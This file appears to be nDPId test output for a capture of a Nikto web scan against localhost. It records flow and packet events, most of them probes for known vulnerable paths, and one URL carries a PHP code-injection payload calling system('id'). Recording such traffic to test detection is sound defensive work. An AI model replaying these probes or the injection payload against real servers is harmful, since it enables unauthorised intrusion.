00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_packet_id":1,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1576420277496,"pkt":"AAAAAAAAAAAAAAAACABFAADEE4xAAEAGKKZ\/AAABfwAAAcWWH5AfSitVmmsDJoAYAED+uAAAAQEICp1m\/iCdZv4gR0VUIC9zcGxhc2hBZG1pbi5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAxOCkNCg0K"}
01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":510,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":510,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277496,"flow_last_seen":1576420277496,"flow_idle_time":7580000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420277496,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50582,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/splashAdmin.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000018)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_packet_id":1,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277497,"pkt":"AAAAAAAAAAAAAAAACABFAAC8mG1AAEAGo8x\/AAABfwAAAcWYH5Bl4KC2nOMxboAYAED+sAAAAQEICp1m\/iGdZv4hR0VUIC9zc2RlZnMvIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDE5KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":511,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":511,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277497,"flow_last_seen":1576420277497,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277497,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50584,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/ssdefs\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000019)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_packet_id":1,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":202,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":202,"pkt_l4_len":168,"thread_ts_msec":1576420277498,"pkt":"AAAAAAAAAAAAAAAACABFAAC88otAAEAGSa5\/AAABfwAAAcWaH5CxdspY+6ys9YAYAED+sAAAAQEICp1m\/iKdZv4iR0VUIC9zc2hvbWUvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="}
01051{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":512,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":512,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277498,"flow_last_seen":1576420277498,"flow_idle_time":7580000,"flow_min_l4_payload_len":136,"flow_max_l4_payload_len":136,"flow_tot_l4_payload_len":136,"midstream":1,"thread_ts_msec":1576420277498,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50586,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/sshome\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000020)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_packet_id":1,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":200,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":200,"pkt_l4_len":166,"thread_ts_msec":1576420277499,"pkt":"AAAAAAAAAAAAAAAACABFAAC61XNAAEAGZsh\/AAABfwAAAcWcH5BK5u2wb4yQmIAYAED+rgAAAQEICp1m\/iOdZv4jR0VUIC90aWtpLyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDIxKQ0KDQo="}
01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":513,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":513,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277499,"flow_last_seen":1576420277499,"flow_idle_time":7580000,"flow_min_l4_payload_len":134,"flow_max_l4_payload_len":134,"flow_tot_l4_payload_len":134,"midstream":1,"thread_ts_msec":1576420277499,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50588,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000021)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_packet_id":1,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":216,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":216,"pkt_l4_len":182,"thread_ts_msec":1576420277500,"pkt":"AAAAAAAAAAAAAAAACABFAADKj49AAEAGrJx\/AAABfwAAAcWeH5BxerdT3YbEDoAYAED+vgAAAQEICp1m\/iSdZv4kR0VUIC90aWtpL3Rpa2ktaW5zdGFsbC5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDAyMikNCg0K"}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":514,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":514,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277500,"flow_last_seen":1576420277500,"flow_idle_time":7580000,"flow_min_l4_payload_len":150,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":150,"midstream":1,"thread_ts_msec":1576420277500,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50590,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/tiki\/tiki-install.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000022)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00686{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_packet_id":1,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1576420277501,"pkt":"AAAAAAAAAAAAAAAACABFAADQ2RZAAEAGYw9\/AAABfwAAAcWgH5BlMeHM00k6b4AYAED+xAAAAQEICp1m\/iWdZv4lR0VUIC9zY3JpcHRzL3NhbXBsZXMvZGV0YWlscy5pZGMgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwMjMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":515,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":515,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277501,"flow_last_seen":1576420277501,"flow_idle_time":7580000,"flow_min_l4_payload_len":156,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"midstream":1,"thread_ts_msec":1576420277501,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50592,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/scripts\/samples\/details.idc","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000023)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_packet_id":1,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":257,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":257,"pkt_l4_len":223,"thread_ts_msec":1576420277503,"pkt":"AAAAAAAAAAAAAAAACABFAADzlctAAEAGpjd\/AAABfwAAAcWiH5BEoK0q6pkm3YAYAED+5wAAAQEICp1m\/iedZv4nR0VUIC9mb3J1bWRpc3BsYXkucGhwP0dMT0JBTFNcW1xdPTEmZj0yJmNvbW1hPVwiLnN5c3RlbVwoJ2lkJ1wpXC5cIiBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDA3MCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01114{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":516,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":516,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277503,"flow_last_seen":1576420277503,"flow_idle_time":7580000,"flow_min_l4_payload_len":191,"flow_max_l4_payload_len":191,"flow_tot_l4_payload_len":191,"midstream":1,"thread_ts_msec":1576420277503,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50594,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forumdisplay.php?GLOBALS\\[\\]=1&f=2&comma=\\\".system\\('id'\\)\\.\\\"","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000070)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00683{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_packet_id":1,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":219,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":219,"pkt_l4_len":185,"thread_ts_msec":1576420277505,"pkt":"AAAAAAAAAAAAAAAACABFAADNh+tAAEAGtD1\/AAABfwAAAcWkH5AZpL8K5\/crh4AYAED+wQAAAQEICp1m\/imdZv4oR0VUIC9ndWVzdGJvb2svZ3Vlc3Rib29rLmh0bWwgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAwNzEpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01068{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":517,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277505,"flow_last_seen":1576420277505,"flow_idle_time":7580000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"midstream":1,"thread_ts_msec":1576420277505,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50596,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/guestbook\/guestbook.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000071)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00690{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_packet_id":1,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":224,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":224,"pkt_l4_len":190,"thread_ts_msec":1576420277506,"pkt":"AAAAAAAAAAAAAAAACABFAADSOPFAAEAGAzN\/AAABfwAAAcWmH5AZrAAQDbKHy4AYAED+xgAAAQEICp1m\/iqdZv4qR0VUIC9odG1sL2NnaS1iaW4vY2dpY3NvP3F1ZXJ5PUFBQSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAwMDcyKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="}
01074{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":518,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277506,"flow_last_seen":1576420277506,"flow_idle_time":7580000,"flow_min_l4_payload_len":158,"flow_max_l4_payload_len":158,"flow_tot_l4_payload_len":158,"midstream":1,"thread_ts_msec":1576420277506,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50598,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/html\/cgi-bin\/cgicso?query=AAA","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000072)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_packet_id":1,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420277509,"pkt":"AAAAAAAAAAAAAAAACABFAADGjRRAAEAGrxt\/AAABfwAAAcWoH5A27bX0CottMYAYAED+ugAAAQEICp1m\/i2dZv4sR0VUIC9iYi1kbmJkL2ZheHN1cnZleSBIVFRQLzEuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMDE0MikNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="}
01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":519,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277509,"flow_last_seen":1576420277509,"flow_idle_time":7580000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420277509,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50600,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/bb-dnbd\/faxsurvey","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000142)"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00667{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_packet_id":1,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277510,"pkt":"AAAAAAAAAAAAAAAACABFAADBP59AAEAG\/JV\/AAABfwAAAcWqH5D7oQd9r6h8pYAYAED+tQAAAQEICp1m\/i6dZv4uR0VUIC9jYXJ0Y2FydC5jZ2kgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDAxNDMpDQpIb3N0OiAxMjcuMC4wLjENCg0K"}
01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":520,"flow_state":"info","flow_src_packets_processed":1,"flow_dst_packets_processed":0,"flow_first_seen":1576420277510,"flow_last_seen":1576420277510,"flow_idle_time":7580000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277510,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50602,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/cartcart.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:000143)"}}
